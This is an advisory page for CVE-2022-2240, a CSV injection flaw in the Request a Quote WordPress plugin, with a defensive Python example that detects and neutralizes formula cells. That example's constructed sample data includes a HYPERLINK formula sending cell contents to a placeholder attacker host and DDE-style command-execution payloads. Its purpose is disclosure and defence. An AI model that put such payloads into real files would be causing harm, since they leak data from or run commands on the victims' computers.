CVE-2022-2240

Request a Quote <= 2.3.7 - CSV Injection

EPSS: 1.2%
CWE-1236
In short

The Request a Quote WordPress plugin, up to and including version 2.3.7, lets anyone, without logging in, attach a CSV file to a quote without the file being checked. When an administrator later downloads that file and opens it in a spreadsheet application, formulas planted in its cells can be evaluated on the administrator's computer.

Technical detail

The plugin does not validate CSV files attached to a quote, so an unauthenticated visitor can submit a file whose cells start with a spreadsheet formula trigger (`=`, `+`, `-`, `@`, a tab or a carriage return), i.e. CSV or formula injection (CWE-1236). The payload is inert on the server; it fires when an administrator downloads the attachment and opens it in a spreadsheet application, where the cells are evaluated with that user's privileges on their own workstation, not with the WordPress admin role. Depending on the application and its settings, such a formula can leak cell contents to an attacker-controlled host (for example via HYPERLINK or WEBSERVICE-style functions) or, through DDE-style payloads, attempt to run a command; current spreadsheet software normally prompts before doing either, but users frequently click through.
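The check the plugin is missing is a server-side pass over each attached CSV before it is stored or offered to an administrator. The following is an added example, not code from the plugin or from the advisory: it flags every cell that a spreadsheet would evaluate as a formula and produces a neutralized copy using the OWASP CSV-injection guidance (prefix the cell with a single quote, quote every field, double embedded quotes). The sample CSV and the payload strings in it are constructed for the demonstration; the `attacker.example` host is a placeholder.

```python
import csv
import io

# Characters that make Excel and LibreOffice Calc treat a cell as a formula
# (OWASP CSV Injection guidance): equals, plus, minus, at-sign, tab, carriage return.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample: a quote attachment with three hostile cells and one
# legitimate negative number. Not real data from the plugin.
SAMPLE_CSV = (
    "name,quantity,note\n"
    "Widget,10,Standard order\n"
    'Gadget,5,"=HYPERLINK(""http://attacker.example/?leak=""&A2,""click"")"\n'
    "Gizmo,-3,\"@SUM(1+1)*cmd|' /C calc'!A0\"\n"
    "Sprocket,2,\"+cmd|' /C calc'!A0\"\n"
)


def is_formula_cell(cell: str) -> bool:
    """True if a spreadsheet would evaluate this cell instead of displaying it.

    Leading spaces are ignored because spreadsheet importers skip them before
    looking at the trigger character. A plain signed number such as "-3" or
    "+1.5" is data, not a formula, so it is exempted; "-2+3" is still flagged.
    """
    stripped = cell.lstrip(" ")
    if not stripped.startswith(FORMULA_TRIGGERS):
        return False
    try:
        float(stripped)
        return False
    except ValueError:
        return True


def find_injection_cells(csv_text: str) -> list[tuple[int, int, str]]:
    """Return (row, column, value) for every cell that would run as a formula."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_cell(cell):
                hits.append((r, c, cell))
    return hits


def neutralize_cell(cell: str) -> str:
    """Force a formula-looking cell to display as text by prefixing a single quote."""
    return "'" + cell if is_formula_cell(cell) else cell


def sanitize_csv(csv_text: str) -> str:
    """Rewrite the CSV with every field quoted and formula cells neutralized.

    QUOTE_ALL wraps each field in double quotes and doubles any embedded quote,
    so the added apostrophe and any commas survive a round trip.
    """
    out = io.StringIO()
    writer = csv.writer(out, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in csv.reader(io.StringIO(csv_text)):
        writer.writerow([neutralize_cell(cell) for cell in row])
    return out.getvalue()


def parse_rows(csv_text: str) -> list[list[str]]:
    """Parse CSV text back into rows, used to verify the sanitized output."""
    return list(csv.reader(io.StringIO(csv_text)))


if __name__ == "__main__":
    for r, c, value in find_injection_cells(SAMPLE_CSV):
        print(f"row {r}, col {c}: {value!r}")
    print(sanitize_csv(SAMPLE_CSV))
```

Rejecting the upload outright on any hit is the simpler policy for a quote form; neutralizing is the option when the file must be kept. The leading apostrophe stays visible when the sanitized file is opened from CSV, which is the accepted trade-off in the OWASP guidance. Either way the check belongs on the server, because the administrator's spreadsheet is the sink and cannot be relied on to refuse the formula.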

Summary generated and translated by AI from the official description.
The Request a Quote WordPress plugin through 2.3.7 does not validate uploaded CSV files, allowing unauthenticated users to attach a malicious CSV file to a quote, which could lead to a CSV injection once an admin downloads and opens it.
